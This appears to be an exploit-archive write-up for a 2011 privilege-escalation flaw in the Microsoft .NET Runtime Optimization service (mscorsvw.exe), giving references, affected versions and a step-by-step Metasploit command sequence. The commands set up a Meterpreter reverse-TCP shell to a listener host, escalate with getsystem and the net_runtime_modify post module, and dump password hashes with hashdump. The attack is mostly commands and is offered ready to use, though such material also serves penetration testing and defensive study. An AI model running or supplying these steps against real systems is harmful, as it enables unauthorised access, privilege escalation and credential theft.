Timeline :

Vulnerability disclosed by XenoMuta on Exploit-DB the 2011-03-08
Metasploit PoC provided by David Rude the 2011-03-08

PoC provided by :

XenoMuta
David Rude

Reference(s) :

EDB-ID-16940
OSVDB-71013

Affected version(s) :

Microsoft .NET Framework include 4.0 and 2.0

Tested on Windows XP SP3 with :

With Microsoft.NET Framework v2.0.50727 mscorsvw.exe

Description :

This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. Seem to work on Windows XP SP3, 2003 R2 & 7.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background

use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit

sessions -i 2
getuid
hashdump